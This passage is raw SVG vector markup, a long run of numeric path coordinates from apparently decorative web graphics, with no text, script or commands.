h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path 